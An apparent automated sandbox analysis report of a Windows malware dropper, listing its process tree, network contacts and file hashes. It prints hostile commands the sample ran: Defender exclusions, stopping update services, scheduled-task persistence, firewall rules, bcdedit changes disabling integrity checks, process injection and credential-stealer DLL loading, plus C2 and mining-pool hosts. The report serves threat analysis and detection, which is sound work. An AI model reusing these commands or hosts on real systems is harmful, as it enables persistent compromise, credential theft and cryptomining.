1fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
"C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe"
C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
"C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe"
C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
"C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"
C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"
C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
"C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe"
C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
"C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
"C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe" --silent --allusers=0
C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp" /SL5="$8001A,491750,408064,C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:N"
C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe
"C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:R" /E
C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe
"C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe"
C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe
"C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe" /S /UID=lylal220
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1130335503.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\1130335503.exe
"C:\Users\Admin\AppData\Local\Temp\1130335503.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "204195515407223645-332532506182008150120580824635124315601540113345344060515"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f & erase "C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\taskeng.exe
taskeng.exe {8AA18C1B-A578-48E8-AAED-20993D8C9F84} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe
"C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe
"C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"
C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp" /SL5="$201D4,833775,56832,C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 396
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2112 CREDAT:275457 /prefetch:2
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\syswow64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1130335503.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231004220120.log C:\Windows\Logs\CBS\CbsPersist_20231004220120.cab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"
C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| DE | 148.251.234.93:443 | yip.su | tcp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | downloads.digitalpulsedata.com | udp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| US | 8.8.8.8:53 | ji.fhauiehgha.com | udp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | jetpackdelivery.net | udp |
| US | 8.8.8.8:53 | bolidare.beget.tech | udp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| US | 8.8.8.8:53 | goboh2b.top | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| US | 188.114.97.1:443 | jetpackdelivery.net | tcp |
| US | 172.67.216.81:443 | flyawayaero.net | tcp |
| RU | 45.8.228.16:80 | goboh2b.top | tcp |
| NL | 13.227.219.122:443 | downloads.digitalpulsedata.com | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| RU | 91.106.207.50:80 | bolidare.beget.tech | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 172.67.180.173:443 | potatogoose.com | tcp |
| NL | 88.221.25.169:80 | apps.identrust.com | tcp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
| HK | 103.100.211.218:80 | ji.fhauiehgha.com | tcp |
| US | 8.8.8.8:53 | justsafepay.com | udp |
| US | 188.114.96.0:443 | justsafepay.com | tcp |
| US | 8.8.8.8:53 | z.nnnaajjjgc.com | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| US | 136.0.77.2:80 | link.storjshare.io | tcp |
| MU | 156.236.72.121:443 | z.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | demo.seafile.com | udp |
| DE | 168.119.152.22:80 | demo.seafile.com | tcp |
| BG | 193.42.32.29:80 | 193.42.32.29 | tcp |
| DE | 168.119.152.22:443 | demo.seafile.com | tcp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| US | 8.8.8.8:53 | m7val1dat0r.info | udp |
| US | 188.114.97.0:443 | m7val1dat0r.info | tcp |
| US | 8.8.8.8:53 | app.nnnaajjjgc.com | udp |
| HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | script.google.com | udp |
| DE | 172.217.23.206:80 | script.google.com | tcp |
| DE | 172.217.23.206:443 | script.google.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | connectini.net | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 91.109.116.11:443 | connectini.net | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | script.googleusercontent.com | udp |
| NL | 142.251.36.1:443 | script.googleusercontent.com | tcp |
| DE | 116.203.7.13:80 | 116.203.7.13 | tcp |
| US | 8.8.8.8:53 | wewewe.s3.eu-central-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| DE | 52.219.171.170:443 | wewewe.s3.eu-central-1.amazonaws.com | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| US | 8.8.8.8:53 | vibrator.s3.pl-waw.scw.cloud | udp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| PL | 151.115.10.1:443 | vibrator.s3.pl-waw.scw.cloud | tcp |
| US | 8.8.8.8:53 | 360devtracking.com | udp |
| GB | 91.109.116.11:80 | 360devtracking.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 873adf6a-6f71-4482-99eb-fc7c976f0505.uuid.safarimexican.net | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard58.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard58.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | server8.safarimexican.net | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 142.251.125.127:19302 | stun1.l.google.com | udp |
| BG | 185.82.216.65:443 | server8.safarimexican.net | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | mastertryprice.com | udp |
| US | 172.67.212.103:443 | mastertryprice.com | tcp |
Files
memory/2408-0-0x00000000009C0000-0x0000000000A1E000-memory.dmp
memory/2408-1-0x0000000074980000-0x000000007506E000-memory.dmp
memory/2408-2-0x0000000004E00000-0x0000000004E40000-memory.dmp
memory/2408-3-0x0000000000500000-0x0000000000544000-memory.dmp
memory/2408-4-0x0000000000640000-0x000000000065A000-memory.dmp
memory/2264-5-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2264-7-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2264-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2408-10-0x0000000074980000-0x000000007506E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5F32.tmp
| MD5 | f3441b8572aae8801c04f3060b550443 |
| SHA1 | 4ef0a35436125d6821831ef36c28ffaf196cda15 |
| SHA256 | 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf |
| SHA512 | 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9 |
C:\Users\Admin\AppData\Local\Temp\Tar5FD1.tmp
| MD5 | 9441737383d21192400eca82fda910ec |
| SHA1 | 725e0d606a4fc9ba44aa8ffde65bed15e65367e4 |
| SHA256 | bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5 |
| SHA512 | 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 549299d0ef99b448b3fda55988424fa9 |
| SHA1 | 59e3ec623526ceb52e29c1689c10e1c6946078f4 |
| SHA256 | 56a3ffe51cabb84d03aa71e92064c09ae76eea33d5480f5603ba349644d2842e |
| SHA512 | 706ad9a734fe4ad926fe2e6f644e175bb17a22f2198d111a7ac01df206d625b9b1507a46fdee1848147eb44537d048e7203cea230c8a4449b064cc90e9e640f2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ba45772adb000d083a1400cbfbbee971 |
| SHA1 | 5db6de5b5c28c27ebc63060ff5f33f562b00506f |
| SHA256 | f4715e640eb4b5b39a1379ee4e251f4e7429cdf42406474b4da0943af2788e18 |
| SHA512 | 2a86b40cef7570339e3ee7323c6038ad523e47a02f7e648fbe95b4f57f784d879a7933b5b043c29ffe8c2da64d82685d8e0c9b60ee0520a2e6c9d3861bdeefda |
\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
| MD5 | 6172d07e0711bc23642c3b6b86e4fec7 |
| SHA1 | c49a6bb96d15baa7d58ff9808c3311454959157b |
| SHA256 | 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6 |
| SHA512 | 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b |
memory/1664-168-0x00000000025B0000-0x00000000029A8000-memory.dmp
C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
| MD5 | 6172d07e0711bc23642c3b6b86e4fec7 |
| SHA1 | c49a6bb96d15baa7d58ff9808c3311454959157b |
| SHA256 | 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6 |
| SHA512 | 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b |
